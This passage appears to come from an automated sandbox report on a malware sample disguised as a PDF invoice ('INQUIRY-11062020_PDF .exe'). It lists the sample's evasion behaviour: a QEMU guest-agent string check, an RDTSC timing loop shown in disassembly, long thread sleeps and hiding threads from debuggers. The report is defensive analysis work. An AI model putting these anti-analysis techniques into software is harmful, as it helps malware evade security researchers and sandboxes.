          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290675824.00000000020E0000.00000040.00000001.sdmp, INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290675824.00000000020E0000.00000040.00000001.sdmp, INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeRDTSC instruction interceptor: First address: 0000000000401821 second address: 0000000000401821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35ECC6C72Eh 0x00000004 call 00007F35ECC6C735h 0x00000009 add esp, 04h 0x0000000c call 00007F35ECC6C735h 0x00000011 add esp, 04h 0x00000014 cmp edi, 006FFF30h 0x0000001a jne 00007F35ECC6C683h 0x00000020 inc edi 0x00000021 call 00007F35ECC6C735h 0x00000026 add esp, 04h 0x00000029 call 00007F35ECC6C735h 0x0000002e add esp, 04h 0x00000031 jmp 00007F35ECC6C72Eh 0x00000033 call 00007F35ECC6C735h 0x00000038 add esp, 04h 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8484 rdtsc 0_2_020E8484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8484 rdtsc 0_2_020E8484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe TID: 6912Thread sleep count: 121 > 30Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe TID: 6900Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe TID: 6912Thread sleep count: 121 > 30Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe TID: 6900Thread sleep time: -60000s >= -30000sJump to behavior
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290675824.00000000020E0000.00000040.00000001.sdmp, INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290675824.00000000020E0000.00000040.00000001.sdmp, INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeThread information set: HideFromDebugger